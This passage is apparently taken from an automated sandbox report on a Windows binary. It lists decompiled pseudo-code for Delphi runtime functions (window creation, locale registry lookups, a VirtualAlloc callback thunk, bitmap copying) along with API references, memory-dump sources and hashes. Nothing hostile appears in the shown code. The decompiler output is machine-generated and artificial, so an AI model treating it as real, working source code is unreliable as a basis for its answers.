					_t10 =  *0x443240; // 0x44328c
					E00413884(_t10, _t16, _t21, __esi, _t31);
					_t22 =  *0x431d0c; // 0x431d58
					_t12 =  *0x441bb8; // 0x441c04
					E00413884(_t12, _t16, _t22, __esi, _t31);
					_t23 =  *0x431d0c; // 0x431d58
					_t14 =  *0x441d6c; // 0x441db8
					E00413884(_t14, _t16, _t23, _t25, _t31);
				}
				_pop(_t20);
				 *[fs:eax] = _t20;
				_push(0x441bb5);
				return 0;
			}















                                                                        0x00441b28
                                                                        0x00441b28
                                                                        0x00441b2d
                                                                        0x00441b2e
                                                                        0x00441b33
                                                                        0x00441b36
                                                                        0x00441b39
                                                                        0x00441b40
                                                                        0x00441b50
                                                                        0x00441b50
                                                                        0x00441b57
                                                                        0x00441b5c
                                                                        0x00441b61
                                                                        0x00441b66
                                                                        0x00441b6b
                                                                        0x00441b70
                                                                        0x00441b76
                                                                        0x00441b7b
                                                                        0x00441b80
                                                                        0x00441b86
                                                                        0x00441b8b
                                                                        0x00441b90
                                                                        0x00441b96
                                                                        0x00441b9b
                                                                        0x00441b9b
                                                                        0x00441ba2
                                                                        0x00441ba5
                                                                        0x00441ba8
                                                                        0x00441bad

                                                                        APIs
                                                                        • GetVersion.KERNEL32(00000000,00441BAE), ref: 00441B42
                                                                          • Part of subcall function 004418D8: GetCurrentProcessId.KERNEL32(?,00000000,00441A50), ref: 004418F9
                                                                          • Part of subcall function 004418D8: GlobalAddAtomA.KERNEL32 ref: 0044192C
                                                                          • Part of subcall function 004418D8: GetCurrentThreadId.KERNEL32 ref: 00441947
                                                                          • Part of subcall function 004418D8: GlobalAddAtomA.KERNEL32 ref: 0044197D
                                                                          • Part of subcall function 004418D8: RegisterClipboardFormatA.USER32 ref: 00441993
                                                                          • Part of subcall function 004418D8: GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,00441A50), ref: 00441A17
                                                                          • Part of subcall function 004418D8: GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 00441A28
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: AtomCurrentGlobal$AddressClipboardFormatHandleModuleProcProcessRegisterThreadVersion
                                                                        • String ID:
                                                                        • API String ID: 3775504709-0
                                                                        • Opcode ID: 4af7d1e06e4179856b6cb7255ac9413e9ea182c3b4e7439e21792739542dd09b
                                                                        • Instruction ID: 2f7da0d823e8454f170ce9909db3841dc0363cc31ad963a92fe894f2ea070a63
                                                                        • Opcode Fuzzy Hash: 4af7d1e06e4179856b6cb7255ac9413e9ea182c3b4e7439e21792739542dd09b
                                                                        • Instruction Fuzzy Hash: C1F0497D6441809FD705FF2AFC52818B7B4E7467463A191BBF80093A32D638B981CB5D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040733E, Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E0040733E(CHAR* __eax, long __ecx, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32) {
				struct HWND__* _t10;

				_t10 = CreateWindowExA(0, __eax, __edx, __ecx, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
				return _t10;
			}




                                                                        0x00407369
                                                                        0x00407370

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: CreateWindow
                                                                        • String ID:
                                                                        • API String ID: 716092398-0
                                                                        • Opcode ID: 80272dabcd13070f2b0510fd908a943113dc0608c8ac620f3197796e7cfed276
                                                                        • Instruction ID: 3ae3b0bb6aa290208680c541b8da8ad6351dd4405c79d6abd1241d14a227bfc1
                                                                        • Opcode Fuzzy Hash: 80272dabcd13070f2b0510fd908a943113dc0608c8ac620f3197796e7cfed276
                                                                        • Instruction Fuzzy Hash: A7E002B2204309BFEB00DE8ADCC1DABB7ACFB4C654F854115BB1C97242D275AD608B71
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00407340, Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E00407340(CHAR* __eax, long __ecx, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32) {
				struct HWND__* _t10;

				_t10 = CreateWindowExA(0, __eax, __edx, __ecx, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
				return _t10;
			}




                                                                        0x00407369
                                                                        0x00407370

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: CreateWindow
                                                                        • String ID:
                                                                        • API String ID: 716092398-0
                                                                        • Opcode ID: f8749ca0a26f364fac6116af4e158c42e39b8565b85338519646d0319e4c55ad
                                                                        • Instruction ID: 109ed22ea2e506524b14edc0d0bd377e8b92066772ad28182da1425e8690dcbf
                                                                        • Opcode Fuzzy Hash: f8749ca0a26f364fac6116af4e158c42e39b8565b85338519646d0319e4c55ad
                                                                        • Instruction Fuzzy Hash: F7E002B2204309BFDB00DE8ADCC1DABB7ACFB4C654F854105BB1C972429275AD608B71
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00405A64, Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E00405A64(void* __eax) {
				char _v272;
				intOrPtr _t14;
				void* _t16;
				intOrPtr _t18;
				intOrPtr _t19;

				_t16 = __eax;
				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
					_t3 = _t16 + 4; // 0x400000
					GetModuleFileNameA( *_t3,  &_v272, 0x105);
					_t14 = E00405CA0(_t19); // executed
					_t18 = _t14;
					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
					if(_t18 == 0) {
						_t5 = _t16 + 4; // 0x400000
						 *((intOrPtr*)(_t16 + 0x10)) =  *_t5;
					}
				}
				_t7 = _t16 + 0x10; // 0x400000
				return  *_t7;
			}








                                                                        0x00405a6c
                                                                        0x00405a72
                                                                        0x00405a7e
                                                                        0x00405a82
                                                                        0x00405a8b
                                                                        0x00405a90
                                                                        0x00405a92
                                                                        0x00405a97
                                                                        0x00405a99
                                                                        0x00405a9c
                                                                        0x00405a9c
                                                                        0x00405a97
                                                                        0x00405a9f
                                                                        0x00405aaa

                                                                        APIs
                                                                        • GetModuleFileNameA.KERNEL32(00400000,?,00000105,00000001,004104D0,00405ACC,00406578,0000FF99,?,00000400,?,004104D0,004141B7,00000000,004141DC), ref: 00405A82
                                                                          • Part of subcall function 00405CA0: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,0047A08C,?,00405A90,00400000,?,00000105,00000001,004104D0,00405ACC,00406578,0000FF99,?), ref: 00405CBC
                                                                          • Part of subcall function 00405CA0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0047A08C,?,00405A90,00400000,?,00000105,00000001), ref: 00405CDA
                                                                          • Part of subcall function 00405CA0: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0047A08C), ref: 00405CF8
                                                                          • Part of subcall function 00405CA0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405D16
                                                                          • Part of subcall function 00405CA0: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,00405DA5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00405D5F
                                                                          • Part of subcall function 00405CA0: RegQueryValueExA.ADVAPI32(?,00405F0C,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,00405DA5,?,80000001), ref: 00405D7D
                                                                          • Part of subcall function 00405CA0: RegCloseKey.ADVAPI32(?,00405DAC,00000000,00000000,00000005,00000000,00405DA5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00405D9F
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Open$FileModuleNameQueryValue$Close
                                                                        • String ID:
                                                                        • API String ID: 2796650324-0
                                                                        • Opcode ID: 3d2362743f924f875b5a350bdc77fee5870a8126f4c59cb65ab49357851bb911
                                                                        • Instruction ID: d33aed5311a0e2fae4487a5322506e26d3b21fe1229f44e33d68ae0e5b1a5d0f
                                                                        • Opcode Fuzzy Hash: 3d2362743f924f875b5a350bdc77fee5870a8126f4c59cb65ab49357851bb911
                                                                        • Instruction Fuzzy Hash: 29E06D71A007208FDB10DEA888C1A4737D8AB08794F000A66FC58EF38AD374DD108BD4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0041D260, Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E0041D260(intOrPtr _a4, intOrPtr _a8) {
				void* _t14;
				void _t15;
				intOrPtr _t25;
				char* _t26;
				void* _t35;

				if( *0x496a20 == 0) {
					_t14 = VirtualAlloc(0, 0x1000, 0x1000, 0x40); // executed
					_t35 = _t14;
					_t15 =  *0x496a1c; // 0x7c0000
					 *_t35 = _t15;
					_t1 = _t35 + 4; // 0x4
					E004029BC(0x47a4bc, 2, _t1);
					_t2 = _t35 + 5; // 0x5
					 *((intOrPtr*)(_t35 + 6)) = E0041D258(_t2, E0041D238);
					_t4 = _t35 + 0xa; // 0xa
					_t26 = _t4;
					do {
						 *_t26 = 0xe8;
						_t5 = _t35 + 4; // 0x4
						 *((intOrPtr*)(_t26 + 1)) = E0041D258(_t26, _t5);
						 *((intOrPtr*)(_t26 + 5)) =  *0x496a20;
						 *0x496a20 = _t26;
						_t26 = _t26 + 0xd;
					} while (_t26 - _t35 < 0xffc);
					 *0x496a1c = _t35;
				}
				_t25 =  *0x496a20;
				 *0x496a20 =  *((intOrPtr*)(_t25 + 5));
				 *((intOrPtr*)(_t25 + 5)) = _a4;
				 *((intOrPtr*)(_t25 + 9)) = _a8;
				return  *0x496a20;
			}








                                                                        0x0041d26e
                                                                        0x0041d27e
                                                                        0x0041d283
                                                                        0x0041d285
                                                                        0x0041d28a
                                                                        0x0041d28c
                                                                        0x0041d299
                                                                        0x0041d2a3
                                                                        0x0041d2ab
                                                                        0x0041d2ae
                                                                        0x0041d2ae
                                                                        0x0041d2b1
                                                                        0x0041d2b1
                                                                        0x0041d2b4
                                                                        0x0041d2be
                                                                        0x0041d2c3
                                                                        0x0041d2c6
                                                                        0x0041d2c8
                                                                        0x0041d2cf
                                                                        0x0041d2d6
                                                                        0x0041d2d6
                                                                        0x0041d2de
                                                                        0x0041d2e3
                                                                        0x0041d2e8
                                                                        0x0041d2ee
                                                                        0x0041d2f5

                                                                        APIs
                                                                        • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 0041D27E
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0
                                                                        • Opcode ID: 3c5408913deefef89f740840773542ad306855a6b70ed471a7900e0b2845a8e5
                                                                        • Instruction ID: ab322e860265238dc008cf03a3abd9f104667954c24ec927d3ccddf525789675
                                                                        • Opcode Fuzzy Hash: 3c5408913deefef89f740840773542ad306855a6b70ed471a7900e0b2845a8e5
                                                                        • Instruction Fuzzy Hash: 3A119E746003058FC710DF19C880B82FBE0EF88350F10C57BE9699B385D3B8E9018BA8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        Function 004239F8, Relevance: 48.5, APIs: 32, Instructions: 500windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 72%
                                                                        			E004239F8(struct HBITMAP__* __eax, struct HPALETTE__* __ecx, struct HPALETTE__* __edx, intOrPtr _a4, signed int _a8) {
				struct HBITMAP__* _v8;
				struct HPALETTE__* _v12;
				struct HPALETTE__* _v16;
				struct HPALETTE__* _v20;
				void* _v24;
				struct HDC__* _v28;
				struct HDC__* _v32;
				struct HDC__* _v36;
				BITMAPINFO* _v40;
				void* _v44;
				intOrPtr _v48;
				struct tagRGBQUAD _v52;
				struct HPALETTE__* _v56;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v132;
				intOrPtr _v136;
				void _v140;
				struct tagRECT _v156;
				void* __ebx;
				void* __ebp;
				signed short _t229;
				int _t281;
				signed int _t290;
				signed short _t292;
				struct HBRUSH__* _t366;
				struct HPALETTE__* _t422;
				signed int _t441;
				intOrPtr _t442;
				intOrPtr _t444;
				intOrPtr _t445;
				void* _t455;
				void* _t457;
				void* _t459;
				intOrPtr _t460;

				_t457 = _t459;
				_t460 = _t459 + 0xffffff68;
				_push(_t419);
				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_v20 = 0;
				if( *(_a8 + 0x18) == 0 ||  *(_a8 + 0x1c) != 0 &&  *(_a8 + 0x20) != 0) {
					if( *(_a8 + 0x18) != 0 ||  *(_a8 + 4) != 0 &&  *(_a8 + 8) != 0) {
						E004235B4(_v8);
						_v116 = 0;
						if(_v8 != 0 && GetObjectA(_v8, 0x54,  &_v140) < 0x18) {
							E00420A08();
						}
						_v28 = E00420B28(GetDC(0));
						_v32 = E00420B28(CreateCompatibleDC(_v28));
						_push(_t457);
						_push(0x424046);
						_push( *[fs:edx]);
						 *[fs:edx] = _t460;
						if( *(_a8 + 0x18) >= 0x28) {
							_v40 = E00402754(0x42c);
							_push(_t457);
							_push(0x423d50);
							_push( *[fs:edx]);
							 *[fs:edx] = _t460;
							 *(_a8 + 0x18) = 0x28;
							 *((short*)(_a8 + 0x24)) = 1;
							if( *(_a8 + 0x26) == 0) {
								_t290 = GetDeviceCaps(_v28, 0xc);
								_t292 = GetDeviceCaps(_v28, 0xe);
								_t419 = _t290 * _t292;
								 *(_a8 + 0x26) = _t290 * _t292;
							}
							_t55 = _a8 + 0x18; // 0x18
							memcpy(_v40, _t55, 0xa << 2);
							 *(_a8 + 4) =  *(_a8 + 0x1c);
							_t441 = _a8;
							 *(_t441 + 8) =  *(_a8 + 0x20);
							if( *(_a8 + 0x26) > 8) {
								_t229 =  *(_a8 + 0x26);
								if(_t229 == 0x10) {
									L30:
									if(( *(_a8 + 0x28) & 0x00000003) != 0) {
										E004239AC(_a8);
										_t441 =  &(_v40->bmiColors);
										E004029BC(_a8 + 0x40, 0xc, _t441);
									}
								} else {
									_t441 = _a8;
									if(_t229 == 0x20) {
										goto L30;
									}
								}
							} else {
								if( *(_a8 + 0x26) != 1 || _v8 != 0 && _v120 != 0) {
									if(_v16 == 0) {
										if(_v8 != 0) {
											_v24 = SelectObject(_v32, _v8);
											if(_v116 <= 0 || _v120 == 0) {
												asm("cdq");
												GetDIBits(_v32, _v8, 0, ( *(_a8 + 0x20) ^ _t441) - _t441, 0, _v40, 0);
											} else {
												_t281 = GetDIBColorTable(_v32, 0, 0x100,  &(_v40->bmiColors));
												_t441 = _a8;
												 *(_t441 + 0x38) = _t281;
											}
											SelectObject(_v32, _v24);
										}
									} else {
										_t441 =  &(_v40->bmiColors);
										E004212BC(_v16, 0xff, _t441);
									}
								} else {
									_t441 = 0;
									_v40->bmiColors = 0;
									 *((intOrPtr*)(_v40 + 0x2c)) = 0xffffff;
								}
							}
							_v20 = E00420B28(CreateDIBSection(_v28, _v40, 0,  &_v44, 0, 0));
							if(_v44 == 0) {
								E00420A80(_t419);
							}
							if(_v8 == 0 ||  *(_a8 + 0x1c) != _v136 ||  *(_a8 + 0x20) != _v132 ||  *(_a8 + 0x26) <= 8) {
								_pop(_t442);
								 *[fs:eax] = _t442;
								_push(0x423d57);
								return E00402774(_v40);
							} else {
								asm("cdq");
								GetDIBits(_v32, _v8, 0, ( *(_a8 + 0x20) ^ _t441) - _t441, _v44, _v40, 0);
								E00403E54();
								E00403E54();
								goto L61;
							}
						} else {
							if(( *(_a8 + 0x10) |  *(_a8 + 0x12)) != 1) {
								_v20 = E00420B28(CreateCompatibleBitmap(_v28,  *(_a8 + 4),  *(_a8 + 8)));
							} else {
								_v20 = E00420B28(CreateBitmap( *(_a8 + 4),  *(_a8 + 8), 1, 1, 0));
							}
							E00420B28(_v20);
							_v24 = E00420B28(SelectObject(_v32, _v20));
							_push(_t457);
							_push(0x423ff7);
							_push( *[fs:eax]);
							 *[fs:eax] = _t460;
							_push(_t457);
							_push(0x423fe6);
							_push( *[fs:eax]);
							 *[fs:eax] = _t460;
							_v56 = 0;
							_t422 = 0;
							if(_v16 != 0) {
								_v56 = SelectPalette(_v32, _v16, 0);
								RealizePalette(_v32);
							}
							_push(_t457);
							_push(0x423fc4);
							_push( *[fs:eax]);
							 *[fs:eax] = _t460;
							if(_a4 == 0) {
								PatBlt(_v32, 0, 0,  *(_a8 + 4),  *(_a8 + 8), 0xff0062);
							} else {
								_t366 = E0041FC84( *((intOrPtr*)(_a4 + 0x14)));
								E00412BCC( *(_a8 + 4), 0,  &_v156,  *(_a8 + 8));
								FillRect(_v32,  &_v156, _t366);
								SetTextColor(_v32, E0041EFA4( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0xc)) + 0x18))));
								SetBkColor(_v32, E0041EFA4(E0041FC48( *((intOrPtr*)(_a4 + 0x14)))));
								if( *(_a8 + 0x26) == 1 &&  *((intOrPtr*)(_a8 + 0x14)) != 0) {
									_v52 = E0041EFA4( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0xc)) + 0x18)));
									_v48 = E0041EFA4(E0041FC48( *((intOrPtr*)(_a4 + 0x14))));
									SetDIBColorTable(_v32, 0, 2,  &_v52);
								}
							}
							if(_v8 == 0) {
								_pop(_t444);
								 *[fs:eax] = _t444;
								_push(E00423FCB);
								if(_v16 != 0) {
									return SelectPalette(_v32, _v56, 0xffffffff);
								}
								return 0;
							} else {
								_v36 = E00420B28(CreateCompatibleDC(_v28));
								_push(_t457);
								_push(0x423f9a);
								_push( *[fs:eax]);
								 *[fs:eax] = _t460;
								_t455 = E00420B28(SelectObject(_v36, _v8));
								if(_v12 != 0) {
									_t422 = SelectPalette(_v36, _v12, 0);
									RealizePalette(_v36);
								}
								if(_a4 != 0) {
									SetTextColor(_v36, E0041EFA4( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0xc)) + 0x18))));
									SetBkColor(_v36, E0041EFA4(E0041FC48( *((intOrPtr*)(_a4 + 0x14)))));
								}
								BitBlt(_v32, 0, 0,  *(_a8 + 4),  *(_a8 + 8), _v36, 0, 0, 0xcc0020);
								if(_v12 != 0) {
									SelectPalette(_v36, _t422, 0xffffffff);
								}
								E00420B28(SelectObject(_v36, _t455));
								_pop(_t445);
								 *[fs:eax] = _t445;
								_push(0x423fa1);
								return DeleteDC(_v36);
							}
						}
					} else {
						goto L61;
					}
				} else {
					L61:
					return _v20;
				}
			}






































                                                                        0x004239f9
                                                                        0x004239fb
                                                                        0x00423a01
                                                                        0x00423a04
                                                                        0x00423a07
                                                                        0x00423a0a
                                                                        0x00423a0f
                                                                        0x00423a19
                                                                        0x00423a3c
                                                                        0x00423a5b
                                                                        0x00423a62
                                                                        0x00423a69
                                                                        0x00423a82
                                                                        0x00423a82
                                                                        0x00423a93
                                                                        0x00423aa4
                                                                        0x00423aa9
                                                                        0x00423aaa
                                                                        0x00423aaf
                                                                        0x00423ab2
                                                                        0x00423abc
                                                                        0x00423b26
                                                                        0x00423b2b
                                                                        0x00423b2c
                                                                        0x00423b31
                                                                        0x00423b34
                                                                        0x00423b3a
                                                                        0x00423b44
                                                                        0x00423b52
                                                                        0x00423b5a
                                                                        0x00423b67
                                                                        0x00423b6c
                                                                        0x00423b73
                                                                        0x00423b73
                                                                        0x00423b7d
                                                                        0x00423b87
                                                                        0x00423b92
                                                                        0x00423b9b
                                                                        0x00423b9e
                                                                        0x00423ba9
                                                                        0x00423c79
                                                                        0x00423c81
                                                                        0x00423c8c
                                                                        0x00423c93
                                                                        0x00423c98
                                                                        0x00423ca0
                                                                        0x00423cae
                                                                        0x00423cae
                                                                        0x00423c83
                                                                        0x00423c83
                                                                        0x00423c8a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00423c8a
                                                                        0x00423baf
                                                                        0x00423bb7
                                                                        0x00423be5
                                                                        0x00423c03
                                                                        0x00423c16
                                                                        0x00423c1d
                                                                        0x00423c52
                                                                        0x00423c62
                                                                        0x00423c25
                                                                        0x00423c37
                                                                        0x00423c3c
                                                                        0x00423c3f
                                                                        0x00423c3f
                                                                        0x00423c6f
                                                                        0x00423c6f
                                                                        0x00423be7
                                                                        0x00423bea
                                                                        0x00423bf5
                                                                        0x00423bf5
                                                                        0x00423bc5
                                                                        0x00423bc8
                                                                        0x00423bca
                                                                        0x00423bd6
                                                                        0x00423bd6
                                                                        0x00423bb7
                                                                        0x00423ccf
                                                                        0x00423cd6
                                                                        0x00423cd8
                                                                        0x00423cd8
                                                                        0x00423ce1
                                                                        0x00423d3c
                                                                        0x00423d3f
                                                                        0x00423d42
                                                                        0x00423d4f
                                                                        0x00423d06
                                                                        0x00423d16
                                                                        0x00423d26
                                                                        0x00423d2b
                                                                        0x00423d30
                                                                        0x00000000
                                                                        0x00423d30
                                                                        0x00423abe
                                                                        0x00423ad0
                                                                        0x00423b14
                                                                        0x00423ad2
                                                                        0x00423af0
                                                                        0x00423af0
                                                                        0x00423d5a
                                                                        0x00423d71
                                                                        0x00423d76
                                                                        0x00423d77
                                                                        0x00423d7c
                                                                        0x00423d7f
                                                                        0x00423d84
                                                                        0x00423d85
                                                                        0x00423d8a
                                                                        0x00423d8d
                                                                        0x00423d92
                                                                        0x00423d95
                                                                        0x00423d9b
                                                                        0x00423dac
                                                                        0x00423db3
                                                                        0x00423db3
                                                                        0x00423dba
                                                                        0x00423dbb
                                                                        0x00423dc0
                                                                        0x00423dc3
                                                                        0x00423dca
                                                                        0x00423ea0
                                                                        0x00423dd0
                                                                        0x00423dd6
                                                                        0x00423df4
                                                                        0x00423e04
                                                                        0x00423e1c
                                                                        0x00423e36
                                                                        0x00423e43
                                                                        0x00423e5c
                                                                        0x00423e6f
                                                                        0x00423e7e
                                                                        0x00423e7e
                                                                        0x00423e43
                                                                        0x00423ea9
                                                                        0x00423fa3
                                                                        0x00423fa6
                                                                        0x00423fa9
                                                                        0x00423fb2
                                                                        0x00000000
                                                                        0x00423fbe
                                                                        0x00423fc3
                                                                        0x00423eaf
                                                                        0x00423ebd
                                                                        0x00423ec2
                                                                        0x00423ec3
                                                                        0x00423ec8
                                                                        0x00423ecb
                                                                        0x00423ee0
                                                                        0x00423ee6
                                                                        0x00423ef7
                                                                        0x00423efd
                                                                        0x00423efd
                                                                        0x00423f06
                                                                        0x00423f1b
                                                                        0x00423f35
                                                                        0x00423f35
                                                                        0x00423f5d
                                                                        0x00423f66
                                                                        0x00423f6f
                                                                        0x00423f6f
                                                                        0x00423f7e
                                                                        0x00423f85
                                                                        0x00423f88
                                                                        0x00423f8b
                                                                        0x00423f99
                                                                        0x00423f99
                                                                        0x00423ea9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0042404d
                                                                        0x0042404d
                                                                        0x00424056
                                                                        0x00424056

                                                                        APIs
                                                                        • GetObjectA.GDI32(00000000,00000054,?), ref: 00423A78
                                                                        • GetDC.USER32(00000000), ref: 00423A89
                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00423A9A
                                                                        • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 00423AE6
                                                                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00423B0A
                                                                        • SelectObject.GDI32(00000000,?), ref: 00423D67
                                                                        • SelectPalette.GDI32(00000000,00000000,00000000), ref: 00423DA7
                                                                        • RealizePalette.GDI32(00000000), ref: 00423DB3
                                                                        • SetTextColor.GDI32(00000000,00000000), ref: 00423E1C
                                                                        • SetBkColor.GDI32(00000000,00000000), ref: 00423E36
                                                                        • SetDIBColorTable.GDI32(00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00423FC4,?,00000000,00423FE6), ref: 00423E7E
                                                                        • FillRect.USER32 ref: 00423E04
                                                                          • Part of subcall function 0041EFA4: GetSysColor.USER32(?), ref: 0041EFAE
                                                                        • PatBlt.GDI32(00000000,00000000,00000000,?,?,00FF0062), ref: 00423EA0
                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00423EB3
                                                                        • SelectObject.GDI32(?,00000000), ref: 00423ED6
                                                                        • SelectPalette.GDI32(?,00000000,00000000), ref: 00423EF2
                                                                        • RealizePalette.GDI32(?), ref: 00423EFD
                                                                        • SetTextColor.GDI32(?,00000000), ref: 00423F1B
                                                                        • SetBkColor.GDI32(?,00000000), ref: 00423F35
                                                                        • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00423F5D
                                                                        • SelectPalette.GDI32(?,00000000,000000FF), ref: 00423F6F
                                                                        • SelectObject.GDI32(?,00000000), ref: 00423F79
                                                                        • DeleteDC.GDI32(?), ref: 00423F94
                                                                          • Part of subcall function 0041FC84: CreateBrushIndirect.GDI32(?), ref: 0041FD2E
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: ColorSelect$CreatePalette$Object$Compatible$BitmapRealizeText$BrushDeleteFillIndirectRectTable
                                                                        • String ID:
                                                                        • API String ID: 1299887459-0
